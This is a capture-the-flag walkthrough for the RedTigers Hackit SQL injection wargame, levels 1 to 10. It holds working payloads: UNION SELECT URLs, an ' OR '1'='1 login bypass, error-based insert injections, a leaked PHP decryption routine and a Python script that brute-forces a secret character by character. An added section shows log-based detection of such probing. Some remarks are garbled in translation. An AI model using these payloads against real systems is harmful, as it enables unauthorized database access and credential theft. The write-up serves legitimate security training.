Penetration Test drill platform RedTigers Hackit customs clearance test

Source: Internet
Author: User


Level 1

A common injection function. You can directly construct a statement.

https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from levelsponusers

Level 2

This level is a simple login bypass; just try the classic SQL "universal password".

Any username, with the password: ' OR '1'='1

Bypass successful

Level 3

Trying to provoke an error did not work at first.

So let's make the application produce an error ourselves.

Whether or not the parameter is injectable, the SQL layer returns no error message; the error has to come from PHP instead.

Passing the parameter as an array:

https://redtiger.labs.overthewire.org/level3.php?usr[0]=a&usr[1]=b

displays an error:

Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21

Because files such as .inc can be fetched directly from the web server, we obtain part of the source code:

<?php

    function encrypt($str)
    {
        $cryptedstr = "";
        for ($i = 0; $i < strlen($str); $i++)
        {
            // each byte is XORed with 192 and written as a zero-padded 3-digit decimal
            $temp = ord(substr($str, $i, 1)) ^ 192;

            while (strlen($temp) < 3)
            {
                $temp = "0" . $temp;
            }
            $cryptedstr .= $temp . "";
        }
        return base64_encode($cryptedstr);
    }

    function decrypt($str)
    {
        // the only validation: the token must look like base64
        if (preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', $str))
        {
            $str = base64_decode($str);
            if ($str != "" && $str != null && $str != false)
            {
                $decStr = "";

                // split into 3-digit groups and undo the XOR
                for ($i = 0; $i < strlen($str); $i += 3)
                {
                    $array[$i / 3] = substr($str, $i, 3);
                }
                foreach ($array as $s)
                {
                    $a = $s ^ 192;
                    $decStr .= chr($a);
                }

                return $decStr;
            }
            return false;
        }
        return false;
    }
?>

This file provides the encryption and decryption routines used for the usr parameter, so we run our injection statement through the same encryption to produce the final POC.

 

https://redtiger.labs.overthewire.org/level3.php?usr=disabled (the encrypted payload is not reproduced in the original)

Level 4

Click me.

Query returned 1 rows.

Adding a single quotation mark changes it to:

Query returned 0 rows.

So it should be blind injection.

ORDER BY shows there are two columns, although that is of little use here. First determine the length:

https://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1 from level4_secret where length(keyword)=17

17 bytes in total, so this time it is definitely not an MD5 hash. Write a script that tries A-Z, a-z and 0-9 at each position to recover the final result:

# -*- coding: utf-8 -*-
import requests
import string

s = requests.Session()
result = ""
# form fields sent with every request (password as given in the writeup)
login = {'password': 'dont_publish_solutions_GRR!',
         'level4login': 'Login'}
# candidate characters for each position: a-z, A-Z, 0-9
charset = string.ascii_lowercase + string.ascii_uppercase + string.digits
url = ("http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1"
       " from level4_secret where SUBSTR(keyword,%d,1)='%s'")
# the keyword is 17 characters long, so positions 1..17
for x in range(1, 18):
    for c in charset:
        r = s.post(url % (x, c), data=login)
        # a correct guess makes the union contribute a second row
        if "2 rows" in r.text:
            result += c
            break
    print(result)
print(result)
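The defender's view of the same enumeration, as an added example that is not part of the original writeup: the script above sends one request per candidate character, so a single client hammering the same endpoint with queries that differ only in the SUBSTR() position and character stands out in the access log. The code and the sample log lines below are constructed here; the log format, the regexes and the threshold are my assumptions.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined style, not real traffic):
# one benign request, three probes from one client differing only in the
# SUBSTR() position/character, and one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /level4.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /level4.php?id=1%20union%20select%20keyword,1%20from%20level4_secret%20where%20SUBSTR(keyword,1,1)=%27a%27 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /level4.php?id=1%20union%20select%20keyword,1%20from%20level4_secret%20where%20SUBSTR(keyword,1,1)=%27b%27 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST /level4.php?id=1%20union%20select%20keyword,1%20from%20level4_secret%20where%20SUBSTR(keyword,2,1)=%27a%27 HTTP/1.1" 200 540
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /level2.php HTTP/1.1" 200 300
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# the two constructs this writeup relies on: UNION SELECT and per-character SUBSTR() comparisons
SQLI_RE = re.compile(r"union\s+select|substr\s*\(", re.IGNORECASE)


def suspicious_requests(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded_target) for every request whose query matches SQLI_RE."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than crash
        target = unquote_plus(m.group("target"))  # decode %20, %27 ... before matching
        if SQLI_RE.search(target):
            hits.append((m.group("ip"), target))
    return hits


def enumeration_sources(log_text: str, threshold: int = 2) -> Dict[str, int]:
    """Clients with at least `threshold` suspicious requests: the repetitive
    signature of a character-by-character blind probe."""
    counts = Counter(ip for ip, _ in suspicious_requests(log_text))
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

On a real server the same logic belongs in the WAF or SIEM rule, and the lasting fix is parameterised queries so that the row count no longer depends on attacker-controlled SQL.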

Level 5

Login bypass. Several functions are disabled, and this is not blind injection; let's look at the error message.

Whether the login succeeds is decided by the number of rows in the final result.

login=Login&password=1&username=' union select 0x61646d696e as username, md5(1) as password #

Level 6

Target: Get the first user in table level6_users with status 1

This is an ordinary injection with a status=1 condition; nothing difficult.

POC

https://redtiger.labs.overthewire.org/level6.php?user=0%20union%20select%201,average,1%20from%20level6_users%20where%20status=1

Level 7

It is again a blind injection, but this time the injection point is the search field and the filtering is stricter, so we change the keyword.

The idea is the same as in the level above.

Re-program the script.


The above Code seems a little problematic.

Level 8

Adding a ' throws an error, so this is clearly error-based injection. Analyse the error and construct the POC:

hans@localhost', name=password, icq='q

Level 9

Still error-based.

Use a ' to determine whether the injection point is inside the textarea, then construct the statement:

'), (select username from level9_users limit 1), (select password from level9_users limit 1), '

Passed.

Level 10

Only a Login button is provided. Capturing the request shows a base64-encoded serialized object (the author calls it JSON).

Decoded:

a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}

